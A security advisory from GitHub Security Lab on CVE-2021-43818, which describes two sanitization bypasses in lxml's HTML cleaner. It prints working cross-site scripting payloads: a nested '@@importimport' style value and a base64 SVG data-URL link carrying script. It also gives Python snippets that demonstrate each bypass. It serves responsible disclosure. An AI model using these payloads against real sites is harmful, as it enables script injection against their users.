January 12, 2022

GHSL-2021-1037_GHSL-2021-1038: Improper sanitization of data URLs and style attributes in lxml HTML Sanitizer - CVE-2021-43818

Alvaro Munoz

Coordinated Disclosure Timeline


The lxml HTML sanitizer fails to properly sanitize data URLs and style attributes



Tested Version

Latest at the time of reporting


Issue 1: Improper sanitization of inline style attributes (GHSL-2021-1037)

The code responsible for cleaning in-line style attributes looks like:

if not self.inline_style:
    for el in _find_styled_elements(doc):
        old = el.get('style')
        new = _css_javascript_re.sub('', old)
        new = _css_import_re.sub('', new)
        if self._has_sneaky_javascript(new):
            # Something tricky is going on...
            del el.attrib['style']
        elif new != old:
            el.set('style', new)

This code uses the following regexps to remove import statements and expression calls:

_css_javascript_re = re.compile(r'expression\s*\(.*?\)', re.S|re.I)
_css_import_re = re.compile(r'@\s*import', re.I)

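However, each substitution is applied in a single pass, so removing a match can itself reassemble a dangerous token. In the following input, deleting the inner @import leaves a new @import behind: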

<div style="@@importimport url('chrome://communicator/skin/');"></div>
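The effect can be reproduced outside lxml with the import regexp quoted above. The following is a minimal sketch that applies only that one substitution to the style value from the example; the variable names payload and cleaned are illustrative and do not come from the sanitizer.

```python
import re

# Same pattern as the one quoted from the sanitizer above.
_css_import_re = re.compile(r'@\s*import', re.I)

# Style value taken from the example <div>.
payload = "@@importimport url('chrome://communicator/skin/');"

# re.sub scans the input once. It removes the inner "@import" but does not
# rescan the text formed by joining the leading "@" with the trailing "import".
cleaned = _css_import_re.sub('', payload)

print(cleaned)

# The pattern that was just "removed" matches the cleaned value again.
still_matches = _css_import_re.search(cleaned) is not None
print(still_matches)
```

Running the sketch shows that the cleaned value begins with @import again, which is the statement the substitution was meant to strip.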

This issue has lower priority since XSS vectors on CSS styles do not normally work on modern browsers.


This issue may lead to Cross-Site Scripting

Issue 2: Improper sanitization of data URL images (GHSL-2021-1038)

When lxml rewrites links, it uses the following regexps to identify possibly malicious schemes:

_is_image_dataurl = re.compile(
    r'^data:image/.+;base64', re.I).search
_is_possibly_malicious_scheme = re.compile(
    r'(?:javascript|jscript|livescript|vbscript|data|about|mocha):',
    re.I).search
def _is_javascript_scheme(s):
    if _is_image_dataurl(s):
        return None
    return _is_possibly_malicious_scheme(s)

Because _is_image_dataurl (the pattern r'^data:image/.+;base64') accepts any data URL whose media type begins with image/, it also accepts data:image/svg+xml;base64, URLs. An SVG image can embed JavaScript, so such a URL passes the check while carrying executable script:

<a href="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==">asdf</a>

Right-clicking the link and opening it in a new tab triggers execution of the JavaScript embedded in the SVG.
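The bypass can be sketched with the standard library alone. In the snippet below, _is_image_dataurl is the pattern quoted above, while the malicious-scheme pattern is a simplified stand-in assumed for illustration (it lists only javascript and data). The SVG payload is a shortened, hypothetical equivalent of the one in the example link.

```python
import base64
import re

# Pattern quoted from the sanitizer above.
_is_image_dataurl = re.compile(r'^data:image/.+;base64', re.I).search

# ASSUMPTION: simplified stand-in for the sanitizer's scheme blocklist.
_is_possibly_malicious_scheme = re.compile(
    r'(?:javascript|data):', re.I).search

def _is_javascript_scheme(s):
    if _is_image_dataurl(s):
        return None  # treated as a harmless image, so the URL is kept
    return _is_possibly_malicious_scheme(s)

# Hypothetical minimal SVG carrying a script element.
svg = (b'<svg xmlns="http://www.w3.org/2000/svg">'
       b'<script>alert("XSS")</script></svg>')
url = "data:image/svg+xml;base64," + base64.b64encode(svg).decode("ascii")

# The SVG data URL is not flagged, although it contains script.
svg_flagged = _is_javascript_scheme(url) is not None

# A non-image data URL is flagged by the stand-in blocklist.
html_flagged = _is_javascript_scheme("data:text/html;base64,AAAA") is not None

# Decoding the accepted URL recovers the script-bearing SVG.
decoded = base64.b64decode(url.split(",", 1)[1])

print(svg_flagged, html_flagged, b"<script" in decoded)
```

The check looks only at the declared media type prefix, so any image/ subtype that can carry active content passes it.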


This issue may lead to Cross-Site Scripting




These issues were discovered and reported by GitHub Security Lab team member @pwntester (Alvaro Muñoz).


When contacting the GHSL team, please include a reference to GHSL-2021-1037 or GHSL-2021-1038 in any communication regarding these issues.